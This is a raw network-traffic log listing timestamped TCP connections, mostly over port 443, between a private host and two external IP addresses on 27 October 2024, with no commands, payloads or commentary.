Oct 27, 2024 17:11:29.563544035 CET	443	57863	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.563649893 CET	57863	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.563716888 CET	57863	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.563716888 CET	57863	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.563739061 CET	443	57863	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.563751936 CET	443	57863	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.566256046 CET	57868	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.566365957 CET	443	57868	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.566457033 CET	57868	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.566564083 CET	57868	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.566589117 CET	443	57868	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.615243912 CET	443	57866	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.615463972 CET	443	57866	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.615602970 CET	57866	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.615839958 CET	57866	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.615839958 CET	57866	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.615865946 CET	443	57866	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.615880013 CET	443	57866	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.616345882 CET	443	57864	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.616456032 CET	443	57864	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.616513968 CET	57864	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.616539955 CET	443	57864	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.616575956 CET	443	57864	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.616626024 CET	57864	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.616647959 CET	443	57864	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.616672993 CET	57864	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.616672993 CET	57864	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.616682053 CET	443	57864	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.616708994 CET	443	57864	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.618062973 CET	57869	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.618140936 CET	443	57869	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.618200064 CET	57870	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.618231058 CET	57869	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.618238926 CET	443	57870	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.618307114 CET	57870	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.618391037 CET	57869	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.618413925 CET	443	57869	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.618417025 CET	57870	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.618432999 CET	443	57870	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.620023012 CET	443	57865	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.620317936 CET	443	57865	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.620373964 CET	57865	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.620404959 CET	57865	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.620419979 CET	443	57865	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.620429993 CET	57865	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.620434999 CET	443	57865	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.622215986 CET	57871	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.622241974 CET	443	57871	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.622458935 CET	57871	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.622458935 CET	57871	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.622509956 CET	443	57871	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.768162012 CET	443	57867	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.768354893 CET	443	57867	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.768441916 CET	57867	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.768486023 CET	57867	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.768496037 CET	443	57867	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.768536091 CET	57867	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.768539906 CET	443	57867	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.770404100 CET	57872	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.770420074 CET	443	57872	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:29.770478964 CET	57872	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.770586014 CET	57872	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:29.770596981 CET	443	57872	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.323657990 CET	443	57868	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.324078083 CET	57868	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.324115992 CET	443	57868	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.324492931 CET	57868	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.324506998 CET	443	57868	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.356333017 CET	443	57870	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.356750011 CET	57870	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.356767893 CET	443	57870	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.357196093 CET	57870	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.357206106 CET	443	57870	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.364662886 CET	443	57869	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.365027905 CET	57869	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.365066051 CET	443	57869	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.365394115 CET	57869	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.365406036 CET	443	57869	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.373837948 CET	443	57871	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.374176979 CET	57871	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.374195099 CET	443	57871	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.374543905 CET	57871	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.374547958 CET	443	57871	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.457329035 CET	443	57868	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.457537889 CET	443	57868	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.457628965 CET	57868	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.457688093 CET	57868	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.457688093 CET	57868	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.457736015 CET	443	57868	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.457762957 CET	443	57868	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.460757017 CET	57873	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.460875988 CET	443	57873	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.460966110 CET	57873	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.461144924 CET	57873	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.461179018 CET	443	57873	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.486706018 CET	443	57870	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.487021923 CET	443	57870	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.487083912 CET	57870	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.487143040 CET	57870	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.487143040 CET	57870	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.487159967 CET	443	57870	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.487180948 CET	443	57870	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.489094019 CET	57874	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.489134073 CET	443	57874	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.489206076 CET	57874	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.489291906 CET	57874	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.489309072 CET	443	57874	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.499885082 CET	443	57869	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.500135899 CET	443	57869	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.500247955 CET	57869	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.500248909 CET	57869	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.500248909 CET	57869	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.501848936 CET	57875	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.501878023 CET	443	57875	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.501975060 CET	57875	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.502073050 CET	57875	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.502099037 CET	443	57875	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.509819984 CET	443	57871	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.509962082 CET	443	57871	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.510026932 CET	57871	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.510056973 CET	57871	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.510098934 CET	443	57871	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.510128021 CET	57871	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.510143042 CET	443	57871	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.512121916 CET	57876	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.512162924 CET	443	57876	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.512233019 CET	57876	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.512347937 CET	57876	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.512377977 CET	443	57876	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.540488958 CET	443	57872	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.540918112 CET	57872	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.540926933 CET	443	57872	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.541368961 CET	57872	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.541373968 CET	443	57872	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.684824944 CET	443	57872	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.684890032 CET	443	57872	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.684950113 CET	57872	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.684958935 CET	443	57872	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.684995890 CET	443	57872	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.685069084 CET	57872	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.685175896 CET	57872	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.685189009 CET	443	57872	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.685200930 CET	57872	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.685209036 CET	443	57872	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.687645912 CET	57877	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.687701941 CET	443	57877	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.687812090 CET	57877	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.687928915 CET	57877	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.687953949 CET	443	57877	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.803376913 CET	57869	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:30.803421021 CET	443	57869	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:30.928823948 CET	57862	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:30.929135084 CET	57878	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:30.935693979 CET	80	57878	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:30.935782909 CET	57878	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:30.935889959 CET	57878	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:30.935980082 CET	80	57862	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:30.936037064 CET	57862	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:30.945230961 CET	80	57878	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:31.208718061 CET	443	57873	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.209209919 CET	57873	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.209254980 CET	443	57873	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.209673882 CET	57873	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.209686995 CET	443	57873	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.241668940 CET	443	57875	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.242165089 CET	57875	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.242187977 CET	443	57875	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.242604971 CET	57875	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.242616892 CET	443	57875	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.262197971 CET	443	57874	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.262459040 CET	57874	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.262473106 CET	443	57874	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.262741089 CET	57874	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.262747049 CET	443	57874	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.268162012 CET	443	57876	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.268393040 CET	57876	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.268439054 CET	443	57876	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.268654108 CET	57876	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.268666983 CET	443	57876	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.340507984 CET	443	57873	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.340656996 CET	443	57873	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.340727091 CET	57873	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.340852976 CET	57873	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.340852976 CET	57873	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.340889931 CET	443	57873	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.340913057 CET	443	57873	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.343548059 CET	57879	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.343606949 CET	443	57879	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.343693018 CET	57879	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.343817949 CET	57879	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.343839884 CET	443	57879	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.373486042 CET	443	57875	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.373617887 CET	443	57875	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.373680115 CET	57875	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.373754978 CET	57875	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.373773098 CET	443	57875	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.373797894 CET	57875	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.373811960 CET	443	57875	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.375956059 CET	57880	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.376036882 CET	443	57880	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.376104116 CET	57880	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.376215935 CET	57880	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.376250029 CET	443	57880	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.398844957 CET	443	57874	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.399014950 CET	443	57874	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.399079084 CET	57874	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.399139881 CET	57874	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.399156094 CET	443	57874	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.399169922 CET	57874	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.399177074 CET	443	57874	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.401057005 CET	57881	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.401149035 CET	443	57881	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.401228905 CET	57881	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.401336908 CET	57881	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.401370049 CET	443	57881	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.402025938 CET	443	57876	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.402071953 CET	443	57876	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.402137041 CET	57876	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.402189970 CET	443	57876	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.402223110 CET	443	57876	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.402278900 CET	57876	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.402323961 CET	57876	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.402323961 CET	57876	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.402363062 CET	443	57876	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.402400017 CET	443	57876	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.404062986 CET	57882	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.404102087 CET	443	57882	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.404177904 CET	57882	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.404289961 CET	57882	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:31.404311895 CET	443	57882	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:31.930165052 CET	80	57878	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:31.930260897 CET	57878	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:32.065553904 CET	443	57877	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.066298008 CET	57877	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.066349030 CET	443	57877	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.066979885 CET	57877	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.066992998 CET	443	57877	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.104821920 CET	443	57880	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.105148077 CET	443	57879	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.105273008 CET	57880	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.105362892 CET	443	57880	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.105469942 CET	57879	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.105503082 CET	443	57879	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.105621099 CET	57880	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.105637074 CET	443	57880	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.105920076 CET	57879	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.105930090 CET	443	57879	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.148557901 CET	443	57881	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.148905993 CET	57881	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.148951054 CET	443	57881	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.149236917 CET	57881	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.149255037 CET	443	57881	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.175060034 CET	443	57882	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.175385952 CET	57882	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.175406933 CET	443	57882	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.175717115 CET	57882	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.175728083 CET	443	57882	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.197031021 CET	443	57877	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.197320938 CET	443	57877	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.197384119 CET	57877	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.197407007 CET	443	57877	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.197441101 CET	443	57877	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.197494030 CET	57877	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.197535038 CET	443	57877	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.197566986 CET	57877	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.197566986 CET	57877	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.197587013 CET	443	57877	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.197607040 CET	443	57877	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.200503111 CET	57883	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.200562000 CET	443	57883	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.200653076 CET	57883	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.200845957 CET	57883	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.200876951 CET	443	57883	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.235642910 CET	443	57880	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.235712051 CET	443	57880	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.235774040 CET	57880	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.236207008 CET	57880	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.236207008 CET	57880	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.236243010 CET	443	57880	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.236267090 CET	443	57880	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.238025904 CET	443	57879	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.238095999 CET	443	57879	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.238162994 CET	57879	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.238183975 CET	443	57879	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.238215923 CET	443	57879	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.238261938 CET	57879	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.238514900 CET	57884	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.238549948 CET	443	57884	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.238617897 CET	57884	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.238640070 CET	57879	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.238640070 CET	57879	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.238660097 CET	443	57879	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.238681078 CET	443	57879	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.239432096 CET	57884	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.239445925 CET	443	57884	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.240638018 CET	57885	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.240720987 CET	443	57885	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.240819931 CET	57885	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.241099119 CET	57885	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.241132975 CET	443	57885	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.280390024 CET	443	57881	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.280455112 CET	443	57881	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.280554056 CET	443	57881	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.280571938 CET	57881	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.280623913 CET	57881	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.280776024 CET	57881	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.280806065 CET	443	57881	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.280833006 CET	57881	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.280847073 CET	443	57881	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.282958984 CET	57886	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.282974005 CET	443	57886	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.283051968 CET	57886	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.283174992 CET	57886	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.283188105 CET	443	57886	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.306811094 CET	443	57882	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.306957006 CET	443	57882	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.307024956 CET	57882	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.307099104 CET	57882	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.307116032 CET	443	57882	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.307159901 CET	57882	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.307190895 CET	443	57882	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.308965921 CET	57887	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.308996916 CET	443	57887	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.309060097 CET	57887	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.309191942 CET	57887	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.309216976 CET	443	57887	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.961791992 CET	443	57883	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.962440968 CET	57883	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.962500095 CET	443	57883	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.962884903 CET	57883	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.962899923 CET	443	57883	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.972019911 CET	443	57885	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.972310066 CET	57885	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.972358942 CET	443	57885	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.972621918 CET	57885	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.972640038 CET	443	57885	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.973936081 CET	443	57884	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.974170923 CET	57884	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:32.974189043 CET	443	57884	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:32.974452019 CET	57884	443	192.168.2.4	13.107.246.51
